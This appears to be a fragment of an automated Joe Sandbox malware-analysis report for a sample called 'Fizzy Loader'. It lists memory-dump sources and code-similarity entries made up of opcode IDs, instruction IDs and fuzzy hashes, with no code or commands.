                                                                                                                                                            • Opcode Fuzzy Hash: e6f5df761f371e6bc71fe32a0e16f8a6798661bdc28a0a436bb41f488d794f14
                                                                                                                                                            • Instruction Fuzzy Hash: 57110432C1D9CE5FE755EB7858580B97FE0EF66A40F4801FBD508E71E3DA282A059345
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: eb4f6b58fb1de48e25c29ec4dafa9b3f44eb26fe89fcb74057588039008033ca
                                                                                                                                                            • Instruction ID: 9648bc545e0f4f67e45eff9b72ad6f35b4d487d0003553535785e4f5ae8a8cf2
                                                                                                                                                            • Opcode Fuzzy Hash: eb4f6b58fb1de48e25c29ec4dafa9b3f44eb26fe89fcb74057588039008033ca
                                                                                                                                                            • Instruction Fuzzy Hash: BB01DF31B1DA458FE658E72C9849936B3D1FBD8754B144ABED40DC72A6CE24EC0687C0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 375d1add12b1eb2894d0c54712fa8baae96609d6b0e8b08c83a42194967a55e7
                                                                                                                                                            • Instruction ID: 96a557ea7f4f965c053a08bcdfe7bf1fbd2d85015d596f91accdcbdc457aef8d
                                                                                                                                                            • Opcode Fuzzy Hash: 375d1add12b1eb2894d0c54712fa8baae96609d6b0e8b08c83a42194967a55e7
                                                                                                                                                            • Instruction Fuzzy Hash: 24014E3290E94D4FDB14EB56AC401E67794FFA4378F04067BD40CE30C1DB695556C751
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 82a94ebab4e7e6bef3f3320e6c34a4a8ee89c4657dd68b9de041eeafd0d85327
                                                                                                                                                            • Instruction ID: 1bfd72d14b3a0cfcfc1f1e268c122377d1fbb4bcc33f3c8d7d028a7fd4d3ae1d
                                                                                                                                                            • Opcode Fuzzy Hash: 82a94ebab4e7e6bef3f3320e6c34a4a8ee89c4657dd68b9de041eeafd0d85327
                                                                                                                                                            • Instruction Fuzzy Hash: 9401D431E0DB850FE78AA77854641707BD1EF56618B2900FBD419CB1E3DA489C068316
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8b1ccb34405a1c39d7ef98024f733af361eaa8b6bc6675580a91290699825283
                                                                                                                                                            • Instruction ID: 1ac093324c1b2a91bf33170a1d3592095b9af8ff00d3fd52087a5ca25297668d
                                                                                                                                                            • Opcode Fuzzy Hash: 8b1ccb34405a1c39d7ef98024f733af361eaa8b6bc6675580a91290699825283
                                                                                                                                                            • Instruction Fuzzy Hash: F101F731E1EA0A0EF788F33C5459A752AD1CFA9BD0F08017BD80DDB2E7DE585D89425A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 02f8a408da8034b7e6a26c79e6b7fbb46cccc7aa9aaaba8f5a3f259cf73d5abf
                                                                                                                                                            • Instruction ID: 7d4be5b4ca4f02d37820a6e8b58cd78cc265155e5ea62d6b49097901b1782029
                                                                                                                                                            • Opcode Fuzzy Hash: 02f8a408da8034b7e6a26c79e6b7fbb46cccc7aa9aaaba8f5a3f259cf73d5abf
                                                                                                                                                            • Instruction Fuzzy Hash: B901F43290FBD95FE346A7355C5A4E63FB4EF53664B0802EBF084CA0A3E61868068365
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 75d4cc74cb04bd1d43534091e7019198556e0594afd9cf6b301f641b7f68eafb
                                                                                                                                                            • Instruction ID: 90292000fbebabc3089bb3193f4740944a7023a1f065601d1b72bb07f3b24b96
                                                                                                                                                            • Opcode Fuzzy Hash: 75d4cc74cb04bd1d43534091e7019198556e0594afd9cf6b301f641b7f68eafb
                                                                                                                                                            • Instruction Fuzzy Hash: E0F04F30719E094FD7A4FA6D9884A7272D2FBAC356B10027DD00DC32A6ED26E8428340
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b637a28818a1bc8b587b15afb4c389e1860bc701048aa686fe427acf102b12f8
                                                                                                                                                            • Instruction ID: 33c594a8533c5bf0251d493a081fad2dd43d7cf8df9e37681c5512d8de91c7d0
                                                                                                                                                            • Opcode Fuzzy Hash: b637a28818a1bc8b587b15afb4c389e1860bc701048aa686fe427acf102b12f8
                                                                                                                                                            • Instruction Fuzzy Hash: 7DF07435618A4E8FCF45EF48D8819EAB3A1FFA8301B504666E41AD7285CA34E955CB80
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f34db693b226f1735187326e684e74bf28d7b752d50632239858907e9aa5b7af
                                                                                                                                                            • Instruction ID: 70235c911c319ecf261665b20fd8fc58968fe380c27602dbf7c6bc290af1c582
                                                                                                                                                            • Opcode Fuzzy Hash: f34db693b226f1735187326e684e74bf28d7b752d50632239858907e9aa5b7af
                                                                                                                                                            • Instruction Fuzzy Hash: AEE06831D4CB4C4FDB90BB28B8045D83BA0FB85354F04006AE00CC31C1C7205895C342
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a3ff72447836b6ffce4f894d5879c2315ede33ed33b85c3570cde0ad4142704e
                                                                                                                                                            • Instruction ID: ee0fd45455d3fe255597890cbceb50fcbc662643d3a2a8afdd12ed49ce1e666d
                                                                                                                                                            • Opcode Fuzzy Hash: a3ff72447836b6ffce4f894d5879c2315ede33ed33b85c3570cde0ad4142704e
                                                                                                                                                            • Instruction Fuzzy Hash: B8F06566A4FDA65FD322A73D64710FABF34EE8622570C02F6C5C806483A759649B8394
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1297c79f1d0cf3937386cb3272633bea5691aeae07586990f97f473e0ae72c17
                                                                                                                                                            • Instruction ID: 982d3afb86fd6758cbe7e009b50cd664fd495ebc2cd556165bcf62e0b8558233
                                                                                                                                                            • Opcode Fuzzy Hash: 1297c79f1d0cf3937386cb3272633bea5691aeae07586990f97f473e0ae72c17
                                                                                                                                                            • Instruction Fuzzy Hash: 54E0C230708C0E0F8AA4F31DA844A7532D6EFD832174801B2E40CC3299DF14CC8283C1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 393d84c5c486f6dea6c997ba02e240b82982d027696ca6bafa35fa6c2b89cf7c
                                                                                                                                                            • Instruction ID: 4537f5cb2438b5881a48e18c018a83cab4e3f628ed0de1ff406fd7406bf8817d
                                                                                                                                                            • Opcode Fuzzy Hash: 393d84c5c486f6dea6c997ba02e240b82982d027696ca6bafa35fa6c2b89cf7c
                                                                                                                                                            • Instruction Fuzzy Hash: 40E04F31D1CD264DFAB4326824055B41180CF482A8F440072DD2DC61D9EF096EC201CE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f28a4dc5881069658a78684c97738c352aaf42f03370f37e4974415d38bb8526
                                                                                                                                                            • Instruction ID: e7d94c6f204f4b0b16eb42fc95fec401b16e78988f0e9f78b677572b82eb3105
                                                                                                                                                            • Opcode Fuzzy Hash: f28a4dc5881069658a78684c97738c352aaf42f03370f37e4974415d38bb8526
                                                                                                                                                            • Instruction Fuzzy Hash: 06E0C221F5A80A4DEB00B374281A1FEB266EFC8254FC00832E90DD21C7CE1C25110185
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 515620f6088f9e60f18c1a1c5fe0f3c9a7098fdd35fc2c93341016ba5435f3d8
                                                                                                                                                            • Instruction ID: 646cc2b2ce8ab75f59016a85adcde762be5764c04d1a74e52737207a5578baf9
                                                                                                                                                            • Opcode Fuzzy Hash: 515620f6088f9e60f18c1a1c5fe0f3c9a7098fdd35fc2c93341016ba5435f3d8
                                                                                                                                                            • Instruction Fuzzy Hash: 2BE0C231F5A80E0DEA80B374281A6FEB266EFC8244FC00832E80DD20C3CE2D24050585
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ecf3e4ee4bc33f096cee017e985a783099a55effeea7d3153757fd7391305340
                                                                                                                                                            • Instruction ID: f485eabb5c83dd4b951262445a1b727e1dd65ceddd76e2281912a16bece3a0df
                                                                                                                                                            • Opcode Fuzzy Hash: ecf3e4ee4bc33f096cee017e985a783099a55effeea7d3153757fd7391305340
                                                                                                                                                            • Instruction Fuzzy Hash: 4DE0C231F5A80A0DEB00B378281A1FEB2A6EF84244FC00832E10DD20C3CF1C24110185
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7a8046e3ea60f20655c5f15b1d0170c67decaa8e46ba1aa8ea310775f5ae195d
                                                                                                                                                            • Instruction ID: d72c6f8398d07ca443944e665a0ec17a7dcfe19008e4276651bdc7ed59b2b2c4
                                                                                                                                                            • Opcode Fuzzy Hash: 7a8046e3ea60f20655c5f15b1d0170c67decaa8e46ba1aa8ea310775f5ae195d
                                                                                                                                                            • Instruction Fuzzy Hash: 08D01721B4A81E1DEA44B7A4681A6FDF296EF88245F80043AE50DC2187CE2D29254685
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                                                                                                                                            • Instruction ID: 1688d2a4ee0c5bab36cd6a48b7bb98f9c7204085e647964bc349d22e3a80067d
                                                                                                                                                            • Opcode Fuzzy Hash: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                                                                                                                                            • Instruction Fuzzy Hash: 67D09E33E5C9164DF798734876132FC7380EBA5AB4F50117BD28FA14C2AE4A342611CA
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f693e5cfe43b0b8166016ee41614e68aeae89bc50e5fe15ae86f9235b3e78a5a
                                                                                                                                                            • Instruction ID: 4b6b381342a3df1cda1560baa87b06617720cba15ca30f2badbd7a78d8926a72
                                                                                                                                                            • Opcode Fuzzy Hash: f693e5cfe43b0b8166016ee41614e68aeae89bc50e5fe15ae86f9235b3e78a5a
                                                                                                                                                            • Instruction Fuzzy Hash: 4AD0EC30929E194FEAB4B77850456A661E0EF18350F400A69D41AD3589DFA8A9858384
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c11f1c37e1af32472ebe581a8fbdda993c0a5c0f65e30c4d2f82d9db7b45f3ae
                                                                                                                                                            • Instruction ID: d80c9c217716c439c3b0b2e68127fae5a64e2f7af82a406705ec9cc53d7dfd23
                                                                                                                                                            • Opcode Fuzzy Hash: c11f1c37e1af32472ebe581a8fbdda993c0a5c0f65e30c4d2f82d9db7b45f3ae
                                                                                                                                                            • Instruction Fuzzy Hash: E6D09531C0FF864FEA71B33460555547BD0DF60310F4404B7C0548618BCD24D1CB4645
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5d821d8c362058f8e1bce4c1147f84219343445fb10fb6fb1d859f1a16e82838
                                                                                                                                                            • Instruction ID: 84a9f57074911e1d34eea172205e8bdfe91184449972ce1ab55f68e974f1febd
                                                                                                                                                            • Opcode Fuzzy Hash: 5d821d8c362058f8e1bce4c1147f84219343445fb10fb6fb1d859f1a16e82838
                                                                                                                                                            • Instruction Fuzzy Hash: 3CB01233F4101D45EF0066C8B4012EDB314DB807A5F001533E23CC10469D57142401D1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e55a75ff9e19932f76e50e3618ba7705c9440b530d8c687fcbbdf5c1af5ca719
                                                                                                                                                            • Instruction ID: ea98452b2ac9c9105a63f6cea3fb02805dbcc00bdb2beea255ce783932becfba
                                                                                                                                                            • Opcode Fuzzy Hash: e55a75ff9e19932f76e50e3618ba7705c9440b530d8c687fcbbdf5c1af5ca719
                                                                                                                                                            • Instruction Fuzzy Hash: CDB01233A4900948DA10258474010FDF310E7C0176F500133CB0D810414682142505C0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2726953792.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff848f40000_Fizzy Loader.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: b73656ccb9c54c143f8768e1a37ddcdd8abbef968b3860c30b144a21026c9be7
                                                                                                                                                            • Instruction ID: b267dc9b0ed1cc48159bebc0f7e1193985a588b0f7744f588354d3e047c9fde1
                                                                                                                                                            • Opcode Fuzzy Hash: b73656ccb9c54c143f8768e1a37ddcdd8abbef968b3860c30b144a21026c9be7
                                                                                                                                                            • Instruction Fuzzy Hash: A5A0223288808E8FCF208E003C020FC3300EB00208F000023EC0E02080ABA232380080